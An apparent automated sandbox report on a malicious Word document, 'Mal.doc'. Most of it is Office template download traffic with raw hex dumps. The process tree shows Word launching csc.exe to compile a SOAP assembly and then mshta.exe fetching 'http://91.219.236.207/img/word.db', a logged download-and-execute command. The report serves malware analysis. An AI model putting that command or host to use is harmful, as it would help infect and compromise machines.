0e cc 8a dd df 15 d9 28 fa e7 6f 10 1d d8 66 cb 69 0a ae db 0b 6c 7b a3 f8 b4 8b 0a 3a bb bd 48 b1 e9 e3 74 e6 ca cc 9e c9 96 66 fe e5 d5 70 98 ae 67 73 62 39 f7 95 79 03 50 b4 65 d8 db 05 52 15 d1 d8 15 17 01 6d 9b 14 e0 c6 8b 22 88 f4 8b e1 85 e6 fb e5 f4 4e 23 74 eb e4 29 8d 84 d3 67 f2 9e b1 bb e2 57 bd 3e 14 b9 c7 7b 4e 96 06 1e b7 30 ba e6 95 ef c4 63 ae a3 18 d0 36 5c 94 bb 9a 69 ee 49 0d 75 17 30 da f3 72 e4 85 a9 f3 be bf e1 b7 47 ac a8 50 4e 77 1d 13 de be 5e 8d ed b4 ee 80 2a 4a 77 0c 90 e7 d2 09 89 7f 23 11 51 ef 52 00 7f 17 54 a8 56 f2 c9 bb ef 51 7c Data Ascii: MSCFL?eDecatur.thmxContent.inf0"o[[(QcfUUUTU>5jUSUU1U5UUPw}H9)[e&6DM'EY$G/JBrOJd!rBZ1f[I\|_-):`rG\|aa`Bfh(T@HF+085Amd0`( X#(~RVKI=UQ2ixSWv8j;YA+9qQ<RhEHE\(ZDk2SsTH/{\|%gnghaY6Lj(rC O_#2WdqK9bd' of$qaBru@"[a}0;)["5D%jsCcr<:Xvh]A307qw`j,s!YV&m;&j=TPx!R5}$6%$9C8<H\zqKXVy>[C/=X>g}d-15_GXt@Bp$%}HE(ofil{:Htfpgsb9yPeRm"N#t)gW>{N0c6\iIu0rGPNw^Jw#QRTVQ\|	2915
Sep 12, 2017 22:19:01.592355967 MESZ	49201	80	192.168.1.16	88.221.14.177	GET /support/templates/en-us/tp01793891.cab HTTP/1.1 X-Office-Version: 14.0.5128 User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro) Host: clienttemplates.content.office.net Connection: Keep-Alive Cache-Control: no-cache	2920
Sep 12, 2017 22:19:02.693610907 MESZ	49202	80	192.168.1.16	88.221.14.177	GET /support/templates/en-us/tp01793892.cab HTTP/1.1 X-Office-Version: 14.0.5128 User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro) Host: clienttemplates.content.office.net Connection: Keep-Alive Cache-Control: no-cache	3052
Sep 12, 2017 22:19:02.821769953 MESZ	80	49201	88.221.14.177	192.168.1.16	HTTP/1.1 200 OK Content-Length: 25817 Content-Type: application/vnd.ms-cab-compressed Content-MD5: FuQIQ8Rh8Jjkn1PnOON8NA== Last-Modified: Fri, 22 Apr 2016 16:13:57 GMT ETag: 0x8D36AC91BCE7075 Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: b2ea577f-0001-001a-197b-6b780e000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Date: Tue, 12 Sep 2017 20:19:02 GMT Connection: keep-alive Data Raw: 4d 53 43 46 00 00 00 00 c9 25 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 02 00 04 00 00 00 00 00 14 00 00 00 00 00 10 00 c9 25 00 00 10 3f 00 00 00 00 00 00 00 00 00 00 85 00 00 00 01 00 03 12 7a 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 69 63 74 75 72 65 6f 72 67 63 68 61 72 74 2e 67 6c 6f 78 00 02 01 00 00 7a 29 00 00 00 00 00 00 00 00 00 00 43 6f 6e 74 65 6e 74 2e 69 6e 66 00 19 57 a3 92 3c 25 7c 2a 5b 80 80 8d 02 10 c0 a7 00 00 42 00 00 14 00 00 3f 00 25 89 68 ad 5a a9 fd d0 61 2d 10 2d c2 42 c3 5a 7a f4 82 d6 90 4a 56 50 50 88 d6 9f a0 b5 48 f2 69 fd d0 fa fd b0 5a 0b 10 0f 33 00 67 35 00 00 04 00 f6 70 2d b5 86 ba 85 d7 24 52 b7 be ad 81 6d 90 1e 78 81 b3 4e ef c8 06 f4 1e ed a1 1e 64 c4 96 8b de fa 0b 8d a4 b0 f4 ee 97 d6 27 4a 05 44 15 e0 55 98 56 e0 44 e3 64 15 4e b8 a1 ff 9b 80 ff 00 40 00 00 04 00 80 66 61 08 bd 7a c5 60 0a 4b 01 cf 80 16 88 f8 03 08 38 ac ef e2 e1 ef 4e 1d af 98 88 1c a0 00 48 0e 80 05 08 68 14 64 f5 b1 bf 04 03 1e fb c1 80 22 b0 1c 8d 0c 20 0c d8 9b 1c 5b b5 00 bb b0 72 03 4d 71 61 65 65 64 39 6f 75 37 6b 6c 49 e7 00 13 f2 31 19 7d d9 fa 85 e8 60 17 a7 e5 97 44 81 17 b1 6c 7c 78 d8 4f bd 4f 71 c6 f2 f2 2c 7b 25 04 d0 b7 e3 a8 15 da eb 7d b8 4c 0e 7d 42 63 61 61 b9 94 ed 9b 2a 8b 2a c3 31 eb 3d 22 8f 9e dd d5 47 ac 30 8d e6 bf 21 d3 a9 47 6d 18 89 62 eb 46 32 b3 9a 71 6d f6 f0 53 24 2c fd 39 6a 99 a4 f2 b7 67 b4 9f e1 2b 55 0d 54 b4 be f3 50 f1 e2 b9 65 cd 3e 5e a1 4a d0 df c3 93 b5 d4 68 4c f1 a9 4f ac 3b b1 5f 6a 67 a6 bc ec 63 ef e2 49 18 e4 6f bb b6 d3 08 83 77 61 4c 9d 6f 6e d9 96 7a 4c c2 17 a8 f6 9f a1 e7 2d 5c b5 a8 dd 57 5e bc 72 ed 20 23 f6 b1 79 b6 4c 31 33 16 b4 d5 b1 36 15 b2 60 5e 1c 98 23 57 3c 54 ee b2 2d 62 39 64 31 da 2e 58 35 d9 f3 20 75 37 af e0 2f bc e9 50 f1 9c 84 27 8c b1 5e 92 b6 81 c0 a7 15 a5 97 78 4b 98 78 37 78 af f4 58 9b 5d d3 4a 9a 39 73 1a 5d 5a 6b 80 a9 59 2a fa 7a 00 26 b4 83 0f ee ca be 9a 4e 5b c7 c6 22 e8 d1 5c e7 d3 61 38 da 01 c8 66 9e cc eb 97 ea 38 3d 5d 2f 4c c1 91 79 e0 b3 e7 a9 69 d0 87 e4 d3 cd 70 c0 e9 eb 57 4c e7 9b ea 35 2a 5c ef 43 64 df 33 51 21 d9 b3 85 fa b1 dc 39 82 cb e9 52 88 52 ef d5 d2 d1 a5 50 84 b2 a7 b9 ba 4c 89 73 56 3e dd 68 f0 57 6c 84 e8 88 67 6b c7 19 bb 92 dd 47 76 87 b4 39 a0 b1 4f 5a eb 0c 2d 43 5e 00 2f 93 bb 13 8a 2b c3 9f 18 41 2f 4b 8d dd 13 f3 52 94 12 78 55 f3 2d ee b4 43 90 2b 16 f3 c8 6e a1 15 ab f3 bb e3 ac 1b 01 d2 c3 16 28 91 1b c7 67 2e 2e 1f 62 5c 2d d9 5a e0 af 93 4e f4 c1 e3 0c 59 18 d4 da 76 60 ae fc d2 f3 3e 51 e9 2c 8a b8 f0 14 5d 25 20 0f 1c 15 73 ac 91 3a da be d2 5d 6c da bb ab 00 49 d9 fc 2a bd cb cc 84 63 d9 f2 7e 9e cb 9b 96 f7 76 9b 8b 1e 37 d6 a1 35 a1 65 82 8e 6d d0 d2 cc 31 24 a7 d5 73 08 5a 7f ac 98 8f 8d 27 0d fd a0 bc e1 1f 6d 4d 42 48 de 87 32 4e fa 69 b4 ff fa 19 ed eb ad ec 00 6e ff 4d fe 6c af 9b d3 69 21 d5 7f a3 13 44 2b 9b 83 7b 36 40 42 d4 93 b3 82 73 77 be 16 d5 6c 30 0d 8d be a0 e4 42 cc e2 7e 6c 8c 56 86 8a f4 ab 85 b1 e7 c7 06 47 86 76 a6 ef 7d bf 33 7e 06 e6 17 77 e4 16 20 10 18 5c d9 d9 18 5b 0d 5c b7 c1 17 7d Data Ascii: MSCF%D%?z)pictureorgchart.gloxz)Content.infW<%\|[B?%hZa--BZzJVPPHiZ3g5p-$RmxNd'JDUVDdN@faz`K8NHhd" [rMqaeed9ou7klI1}`Dl\|xOOq,{%}L}Bcaa1="G0!GmbF2qmS$,9jg+UTPe>^JhLO;_jgcIowaLonzL-\W^r #yL136`^#W<T-b9d1.X5 u7/P'^xKx7xX]J9s]ZkYz&N["\a8f8=]/LyipWL5\Cd3Q!9RRPLsV>hWlgkGv9OZ-C^/+A/KRxU-C+n(g..b\-ZNYv`>Q,]% s:]lIc~v75em1$sZ'mMBH2NinMli!D+{6@Bswl0B~lVGv}3~w \[\}	3054
Sep 12, 2017 22:19:03.193259001 MESZ	49201	80	192.168.1.16	88.221.14.177	GET /support/templates/en-us/tp01793893.cab HTTP/1.1 X-Office-Version: 14.0.5128 User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro) Host: clienttemplates.content.office.net Connection: Keep-Alive Cache-Control: no-cache	3080
Sep 12, 2017 22:19:03.848315001 MESZ	80	49202	88.221.14.177	192.168.1.16	HTTP/1.1 200 OK Content-Length: 21575 Content-Type: application/vnd.ms-cab-compressed Content-MD5: mXVXo8lWHZzg17b9mh29Yw== Last-Modified: Fri, 22 Apr 2016 16:13:58 GMT ETag: 0x8D36AC91C75B282 Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 97c3ad4c-0001-004c-39db-df907e000000 x-ms-version: 2009-09-19 x-ms-write-protection: false x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Date: Tue, 12 Sep 2017 20:19:03 GMT Connection: keep-alive Data Raw: 4d 53 43 46 00 00 00 00 37 15 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 02 00 04 00 00 00 00 00 14 00 00 00 00 00 10 00 37 15 00 00 10 3f 00 00 00 00 00 00 00 00 00 00 7b 00 00 00 01 00 03 12 f8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 72 69 6e 67 73 2e 67 6c 6f 78 00 ee 00 00 00 f8 18 00 00 00 00 00 00 00 00 00 00 43 6f 6e 74 65 6e 74 2e 69 6e 66 00 81 4e c0 ae b4 14 e6 19 5b 80 80 8d 01 10 60 9e 00 00 52 00 50 13 00 00 4f 00 15 a4 52 12 42 44 b4 43 74 65 6e b8 08 d1 a2 a2 b8 11 b8 61 ba 65 6d 2c 95 52 f2 4a a8 44 5d 84 d2 74 4d e1 52 84 85 2b 6e 74 5d b8 20 74 33 c3 00 08 92 01 00 ab 00 00 b0 02 c1 72 b0 5c 78 e5 b3 59 b7 6a 5c 81 ce 61 07 5e e0 75 86 5d 41 72 68 f7 ab 3e d6 0e ce cd db cc 1b 7d da 39 be c6 77 18 26 98 f0 82 6f 32 6f 02 83 12 0b a6 e7 c4 fe ff 00 02 00 00 00 00 45 22 53 00 dc 07 86 fa e8 58 be eb 22 02 f1 03 20 20 58 0b c9 b1 df df 37 c2 25 6a b3 39 33 20 16 40 bb 81 b1 0f d3 4a ba c5 ea 98 b8 7c 6f 1c d2 ac 6e 80 08 03 e6 65 0b 31 0d cd 99 60 9c d7 b6 43 6e b6 af 02 85 30 af 11 70 40 67 68 82 3a 03 34 d5 55 cf ca d5 a5 a9 dc e9 62 7b ba e9 d9 26 f0 00 8f 6a 91 4a 18 f5 14 90 ed bc 25 dd 35 e5 11 3b 47 a0 65 98 ba cf e4 73 da b4 ee 93 c1 1a b5 ad b8 13 67 15 c0 2a 58 11 db ca 9e ed 7a 71 f8 d1 0a b2 37 d5 bf 49 94 53 7e 90 d4 26 ae 80 0f c2 c4 cf 50 40 87 53 a1 7f df f0 d3 67 e2 41 0e 72 8a a3 fa 89 bc 72 b9 2e 07 e2 58 2d 47 5b 3d 5c 85 db 46 e3 c8 75 dd 2f ab 13 e8 4b 83 15 75 d7 a3 6f dc a7 c7 e1 5c 11 b9 eb af 59 57 9c 6a c6 71 87 b4 d4 86 dc d2 20 4a 5a 20 4a 34 4a 22 8a bc dc 54 c4 dc 50 c4 63 2d 5c 0e 36 df 68 d3 dc 78 c3 17 88 8e 04 5f e4 63 03 85 e9 e8 e6 69 26 3b 2f c1 af ab db 43 5a 64 2d 60 6b 2d e9 9f 79 43 2e 18 df 42 53 bb 8f 62 4a e6 74 44 cc 5d ea ca 16 dc ef 4f ad 15 66 6d e9 90 56 ce 2b 2b 2a 6b f6 87 90 85 8d af f6 e1 b4 56 d3 4d 96 fa 36 3a 53 5c 88 12 1d 23 ed 73 63 0a 9d e4 c7 dd b0 8a fb 6c f8 63 c3 2e 02 17 c8 33 e6 7a b9 d6 ed 4a 08 17 e5 0e 6c d8 40 7a 24 d8 21 6d 6d ef 84 cf ac de a4 c3 92 6d b6 c4 27 d5 ba 8a ad e0 05 48 5c 7f b3 62 39 63 3f 7e 1c aa 51 7d e5 3a 69 53 83 1f 48 a3 aa 23 13 95 8c b6 71 62 e8 42 84 26 71 44 56 a9 84 0c 36 32 97 8b ae 6c 15 c5 44 a3 c5 dc 1f 24 90 cc 58 76 44 7f ea c4 6b 7a ad 69 f4 99 0a a5 8f 86 09 02 a6 a6 be 43 00 0b c9 2a ef 9c f3 51 0d a9 6f 43 b0 43 52 ac c7 aa 51 5b 66 bb af 82 59 89 a2 a0 82 8a 86 7e ca 58 80 db 37 dd 31 7a 77 8f a7 2e 71 4d 1b 4b 88 71 48 11 b9 a7 4e be ac f7 d8 d9 e5 69 32 79 df ee 86 a2 e9 6e c2 e8 c0 a2 68 bc 75 ed 08 6f 05 0d 5e b4 f3 a3 6c ba ce e3 b1 d8 7e 16 d5 a6 46 49 fc 5e 61 60 be 32 64 00 e8 61 73 14 31 17 45 2e 28 a6 b6 2b 80 fc 72 88 24 44 a9 e3 3b a8 ab d3 fa 42 bf 5c a9 aa de c3 e0 51 9c cd 48 57 3c df a4 cd a6 72 13 4b 98 89 a7 7e e8 dc ca 1f d3 88 49 b4 69 93 df 61 fb ae f3 9e ee 3d 10 04 9d 15 12 ac d7 07 5b 3f 5e b7 97 8d 07 4a a4 fa 82 9b 6b 88 1d 0c 2c a5 5e ef 82 80 74 76 a5 15 3b 80 66 08 3f 96 5b b2 18 5b d1 8f c1 ce 25 a6 fa 2a bc 18 Data Ascii: MSCF7D7?{rings.gloxContent.infN[`RPORBDCtenaem,RJD]tMR+nt] t3r\xYj\a^u]Arh>}9w&o2oE"SX" X7%j93 @J\|one1`Cn0p@gh:4Ub{&jJ%5;GesgXzq7IS~&P@SgArr.X-G[=\Fu/Kuo\YWjq JZ J4J"TPc-\6hx_ci&;/CZd-`k-yC.BSbJtD]OfmV++kVM6:S\#sclc.3zJl@z$!mmm'H\b9c?~Q}:iSH#qbB&qDV62lD$XvDkziCQoCCRQ[fY~X71zw.qMKqHNi2ynhuo^l~FI^a`2das1E.(+r$D;B\QHW<rK~Iia=[?^Jk,^tv;f?[[%	3081
Sep 12, 2017 22:19:03.996839046 MESZ	80	49201	88.221.14.177	192.168.1.16	HTTP/1.1 200 OK Content-Length: 20065 Content-Type: application/vnd.ms-cab-compressed Content-MD5: pvUF5PbeuceI4cK/W7Tg/g== Last-Modified: Fri, 22 Apr 2016 16:13:59 GMT ETag: 0x8D36AC91CF6F497 Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: d20d2e84-0001-000b-01d5-6b4f15000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Date: Tue, 12 Sep 2017 20:19:03 GMT Connection: keep-alive Data Raw: 4d 53 43 46 00 00 00 00 51 0f 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 02 00 04 00 00 00 00 00 14 00 00 00 00 00 10 00 51 0f 00 00 10 3f 00 00 00 00 00 00 00 00 00 00 7f 00 00 00 01 00 03 12 0b 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 61 62 62 65 64 41 72 63 2e 67 6c 6f 78 00 f6 00 00 00 0b 13 00 00 00 00 00 00 00 00 00 00 43 6f 6e 74 65 6e 74 2e 69 6e 66 00 78 13 14 33 ca 0e 01 14 5b 80 80 8d 01 10 10 40 00 00 52 00 50 13 00 00 4f 00 43 97 89 94 25 51 10 0a 97 62 b9 41 12 42 08 4a b0 46 8d c5 1b b6 74 0b 7b e5 52 b5 94 e1 51 51 49 14 c5 e0 c5 70 12 42 0b 46 4d 17 5c 74 84 2e 00 02 48 00 c0 88 00 00 ac 00 b4 1d 76 33 dd 0e 94 82 dc ac 0c bc 43 dd f0 3a 2f 3b 3a 03 2c f0 f7 41 a1 d9 99 d9 ad 0f 7a 4b be 4a c7 d6 99 7d f7 16 64 89 44 1a 12 cf 0d 65 04 5e 77 60 be 89 7f 26 e0 ff 00 10 00 00 04 00 50 24 40 05 57 cf 65 b5 d9 94 cc a8 be 18 41 a8 97 75 fc 7f 7f 97 d8 94 e5 ab 0d 0b 2b 80 c0 00 70 0d c4 b4 c2 f3 a7 7b 12 c8 00 a0 fe f6 c0 21 f0 19 83 19 68 85 0a 6d 60 24 01 21 0b 47 1b 6e 0c ae 98 15 6a 33 2e 3a 48 e0 0f 8d 3a 3b 07 02 d1 33 bd 9f 49 2b fd 32 7d b6 7e 54 48 8f 4c 08 93 db b5 b2 b5 da 50 25 69 de e7 86 6a 6c dd 7d ea e3 3e 73 6e 09 ed 04 cf 73 e8 80 a1 3a 0c ea 97 3e 36 75 74 19 13 33 be 39 b5 a7 cb 69 bd 92 72 a8 93 b6 5c fe 77 82 60 2f 7b 7f 88 53 6a 0f cc ce 22 54 b6 f3 4b ad 01 35 dc a2 76 c3 c1 4e b9 ba e7 fb 73 98 6f 24 dc 4e 5c f0 98 a4 ec 5e 31 43 29 a5 c1 10 41 f0 dc 53 d5 76 ca 03 97 72 19 63 5c 07 54 13 bc b3 f1 73 41 55 94 54 1d 40 4a 8e 29 4a 47 07 17 e8 25 67 5b d8 b8 a9 fc bb 1d 5c d3 4d 53 d0 d3 c9 eb 6b cf ef a6 1a b4 28 28 a1 ab 12 24 d7 2c fb 11 18 9d 92 e8 44 c4 78 b8 22 0b d4 5b 6b 03 4f 8b 9b eb 82 71 36 3a ba 01 f9 17 88 24 0c 6e 6f 9e 79 59 87 e7 26 76 06 52 94 c5 2d bc 87 b3 72 2f 0f 94 4e 99 4d 7b e6 67 8d 7e 62 49 d0 fe a6 6b 7d ca c2 4d ef 44 ce ba b9 21 d3 f1 03 a5 6b 2c 16 dd 6c 24 e8 85 6f 4a 0f df d9 43 d9 16 e9 b4 69 6b a2 97 a8 b9 1f 15 eb 94 10 98 43 c3 2b d0 51 a9 19 82 3f 48 7e 85 87 ec de 27 d8 9d f9 1b 13 ee b8 fb 80 b0 a0 52 1c 4a 57 11 b5 2b b6 fd 93 4c b2 0f ef 9f 81 21 91 e2 ae 81 c4 3b 07 41 52 d0 96 f1 5b e7 09 ee f1 02 a5 bc 12 7c 71 bc 76 bd 34 ad d5 ae 88 b2 97 1a 82 9c b9 74 81 8f 8d ec 18 bf d1 55 a9 b8 b1 5d a5 af af 48 97 1e 89 2b 1a 42 b4 0f d3 93 8c 15 85 e1 32 c1 96 dd f7 0e 24 81 f0 c7 ff 20 53 80 3f 56 fc 3a ad 51 15 6d 21 af 98 fd dd 3f d3 23 80 61 68 01 03 ff 22 f5 31 35 57 89 b4 f0 14 f2 7f de 14 b4 19 71 60 94 62 11 0f 51 d1 34 8f 85 21 8b 32 0e 66 a3 29 16 f0 ac e1 89 e8 80 67 53 d4 58 f6 0a ec 19 37 6d 06 b5 c3 d7 e3 af f1 c5 98 b8 0d ad d1 a0 69 0c 81 db 65 12 86 62 14 b6 28 45 bf 18 fe 2d ce 4e b4 79 2f 6b cb 26 40 ac b0 41 ad 03 5a d3 02 23 23 82 24 f9 6d 63 9e 99 cf a1 2d 1d 5b 0f 8e fa 9b 67 0b 0e 67 1b ca 2d 5a b8 95 f4 4f bf e1 9b 37 ff 05 3a 5e d2 ff f3 ee 48 cf fa 42 30 38 48 df 7f c1 07 db ba e2 36 ab b6 29 da fd 98 3f ea 05 1e d4 6b a6 8a d4 be 69 7e d6 08 a6 4f 08 79 a7 fb 3f 41 e1 db 0d 62 e4 28 c8 71 28 a0 1e 36 93 bb 48 d1 16 cf 78 2c 8a 81 8c 61 b1 94 b5 cf 20 Data Ascii: MSCFQDQ?TabbedArc.gloxContent.infx3[@RPOC%QbABJFt{RQQIpBFM\t.Hv3C:/;:,AzKJ}dDe^w`&P$@WeAu+p{!hm`$!Gnj3.:H:;3I+2}~THLP%ijl}>sns:>6ut39ir\w`/{Sj"TK5vNso$N\^1C)ASvrc\TsAUT@J)JG%g[\MSk(($,Dx"[kOq6:$noyY&vR-r/NM{g~bIk}MD!k,l$oJCikC+Q?H~'RJW+L!;AR[\|qv4tU]H+B2$ S?V:Qm!?#ah"15Wq`bQ4!2f)gSX7mieb(E-Ny/k&@AZ##$mc-[gg-ZO7:^HB08H6)?ki~Oy?Ab(q(6Hx,a	3104
Sep 12, 2017 22:19:04.128868103 MESZ	49202	80	192.168.1.16	88.221.14.177	GET /support/templates/en-us/tp01793894.cab HTTP/1.1 X-Office-Version: 14.0.5128 User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro) Host: clienttemplates.content.office.net Connection: Keep-Alive Cache-Control: no-cache	3123
Sep 12, 2017 22:19:04.718770027 MESZ	49201	80	192.168.1.16	88.221.14.177	GET /support/templates/en-us/tp01840907.cab HTTP/1.1 X-Office-Version: 14.0.5128 User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro) Host: clienttemplates.content.office.net Connection: Keep-Alive Cache-Control: no-cache	3125
Sep 12, 2017 22:19:04.874424934 MESZ	80	49202	88.221.14.177	192.168.1.16	HTTP/1.1 200 OK Content-Length: 19506 Content-Type: application/vnd.ms-cab-compressed Content-MD5: tDiKPOJijau0NitJZ7VAPQ== Last-Modified: Fri, 22 Apr 2016 16:14:00 GMT ETag: 0x8D36AC91D71F4EB Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: b76bace1-0001-0046-67d5-6b89f7000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Date: Tue, 12 Sep 2017 20:19:04 GMT Connection: keep-alive Data Raw: 4d 53 43 46 00 00 00 00 22 0d 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 02 00 04 00 00 00 00 00 14 00 00 00 00 00 10 00 22 0d 00 00 10 3f 00 00 00 00 00 00 00 00 00 00 86 00 00 00 01 00 03 12 b9 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 61 72 79 69 6e 67 57 69 64 74 68 4c 69 73 74 2e 67 6c 6f 78 00 04 01 00 00 b9 10 00 00 00 00 00 00 00 00 00 00 43 6f 6e 74 65 6e 74 2e 69 6e 66 00 56 93 ee fd 94 0c bd 11 5b 80 80 8d 01 10 d0 1b 00 00 42 06 60 13 00 00 5f 00 d0 cb b8 f6 2a 95 d5 6a 46 e9 c9 10 53 0d 48 92 0e 45 c6 d0 61 18 6c 83 d2 1b ee ae 56 e7 9d eb 3e 2a 75 88 a0 50 31 97 d2 2b e8 55 24 87 42 b0 c1 88 08 2f d6 30 00 10 33 03 00 46 00 00 60 05 20 ed a8 bd 4f 77 52 02 ba 24 02 cf 82 ec f0 f5 b3 3e dd c0 0e 3c 1f ca a1 74 90 dd 36 7d dd 89 24 51 5b fb fa 4e 5d da 36 de 97 61 2d 07 3b 2b de c0 78 27 c4 9b ff ef 04 fe 00 00 00 00 64 00 00 68 0d 86 aa b3 29 46 c7 52 82 c8 e2 83 20 20 b0 0e 8c e3 df df 35 c2 d8 4a 23 c3 0c b0 36 40 46 03 a1 dd e0 4f c7 c9 3a 81 00 60 9e 17 f4 f8 c0 0c c2 0c b4 c4 12 0d 70 30 c1 46 1b 24 47 9c c5 e9 66 09 35 14 19 21 63 d0 6b 66 95 77 0b 01 ee d9 f7 e7 d2 c6 d5 50 30 8f fc aa 80 7e 64 10 b3 eb a2 d6 50 eb 9c 4f 74 3f ae 6d 3a 63 d2 ce 1a fb 8f 3c 5f 46 9f d5 7d af e6 e8 aa 45 10 67 51 e2 f3 35 97 a2 30 45 9e b3 f9 68 90 36 77 52 4e 95 b2 d6 e9 9f d1 91 2c 41 de 20 97 55 c0 0c cc ce d9 60 41 77 a7 a8 83 9c eb cd 26 a2 06 c1 77 79 03 ec 4d ea 5e 4b 77 02 76 c0 5f 93 58 db 10 8a 4e 15 03 3f bc a3 b7 a9 54 a0 2b 17 5d b9 c8 24 de 42 52 99 ed ce ff de bc 9d ad ab 21 42 42 86 92 74 10 2f 8f 10 cb 4e fd b0 d8 39 b8 d2 42 58 80 a3 53 7d 51 29 28 a9 1b 54 cd 5c 23 22 28 17 45 29 49 c9 6d bd 29 f1 1e 5e 24 8a 78 96 39 c6 d7 0a 69 a5 77 d1 73 75 66 5d 38 ca af f0 98 50 11 42 8e 62 a1 a0 e5 67 4a a9 ef 3b 05 41 8d ad 5f 75 e5 e6 62 d6 2a 66 39 61 4d 36 b6 6e 53 f2 50 11 82 41 5d 40 49 ed c4 0b c1 2a af 08 34 b5 89 32 83 f8 e3 ae 08 6f bd f1 ad d9 ed b6 78 f7 58 88 c7 b0 2b 6e f5 a7 0e 90 9d f4 3c 04 da de 8d bc 7b 22 c8 5e b2 17 8b 42 40 04 a0 8b 0e a3 f3 e0 4c 06 6a ac 65 bc 63 c5 c2 22 3d 6c 59 8f b4 2e ec 2c ac 54 1b dd d4 62 fa 5b 86 2c 31 10 8a 57 81 91 15 e1 7e 92 95 3d 14 dc c9 b1 ea b9 eb 6a 87 a9 a6 c1 b6 5c e1 6d f6 d4 93 a7 d6 c1 be 23 4b f6 70 a1 05 9d 30 5c 4d 40 a5 90 64 15 ea 10 d7 45 b4 55 ac bb 6e 92 d9 ca ae 29 2a 10 69 29 68 99 4b 6b 42 a4 bf f8 9a be 44 c7 a1 11 a7 51 2c ab ee 3d 1b 06 e8 a6 11 af 72 73 00 c9 3c bd c5 fb a3 6b d1 bf 13 7e ae 8b 85 01 ef fd 33 00 a1 c2 87 7c 40 d6 f4 71 3b d6 d2 6d 96 e8 64 78 5a 6b 7a cc 00 df dd e7 1a 62 b0 29 44 70 cc 6f e8 78 6b 23 2c 25 1b 9e 35 eb 14 72 70 34 e6 b6 00 d5 08 69 e0 c8 42 f3 59 9b 99 5b b6 85 7c b4 c4 25 3a 7b 68 2a ca 30 eb 29 6c 78 3f 12 83 b8 45 9a e1 b7 bc d7 26 b8 34 10 1e 8f 9c de 20 10 56 e6 43 91 8e 04 6e 46 ee 6f c5 df db 19 8c 86 ee c2 1a d1 11 d0 4b bc 58 2b 81 96 12 41 d1 51 02 d3 ef 0d 60 f4 f4 7d 6b b6 43 58 1d 0c a8 ff ce dc 2d ce 57 94 dc 9e e2 ca b7 33 f7 87 d8 fc ea 4f a9 39 0c fb 1f 68 22 80 bc 7b 7f 28 61 80 c6 3e c2 3a 56 75 23 6c f9 1b 18 Data Ascii: MSCF"D"?VaryingWidthList.gloxContent.infV[B`_jFSHEalV>uP1+U$B/03F` OwR$><t6}$Q[N]6a-;+x'dh)FR 5J#6@FO:`p0F$Gf5!ckfwP0~dPOt?m:c<_F}EgQ50Eh6wRN,A U`Aw&wyM^Kwv_XN?T+]$BR!BBt/N9BXS}Q)(T\#"(E)Im)^$x9iwsuf]8PBbgJ;A_ubf9aM6nSPA]@I42oxX+n<{"^B@Ljec"=lY.,Tb[,1W~=j\m#Kp0\M@dEUn)i)hKkBDQ,=rs<k~3\|@q;mdxZkzb)Dpoxk#,%5rp4iBY[\|%:{h0)lx?E&4 VCnFoKX+AQ`}kCX-W3O9h"{(a>:Vu#l	3126

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 3284 Parent PID: 2848

General

Start time:	22:17:59
Start date:	12/09/2017
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\Mal.doc
Imagebase:	0x75860000
File size:	1422168 bytes
MD5 hash:	113371C5AC72FCE072F707C55E7845B9
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: csc.exe PID: 3368 Parent PID: 3284

General

Start time:	22:18:06
Start date:	12/09/2017
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h39sf8po.cmdline'
Imagebase:	0x75860000
File size:	77960 bytes
MD5 hash:	0A1C81BDCB030222A0B0A652B2C89D8D
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: cvtres.exe PID: 3392 Parent PID: 3368

General

Start time:	22:18:07
Start date:	12/09/2017
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESD201.tmp' 'c:\Windows\System32\com\SOAPAssembly\CSCD1D2.tmp'
Imagebase:	0x756a0000
File size:	32912 bytes
MD5 hash:	200FC355F85ECD4DB77FB3CAB2D01364
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: mshta.exe PID: 3448 Parent PID: 3284

General

Start time:	22:18:08
Start date:	12/09/2017
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' http://91.219.236.207/img/word.db
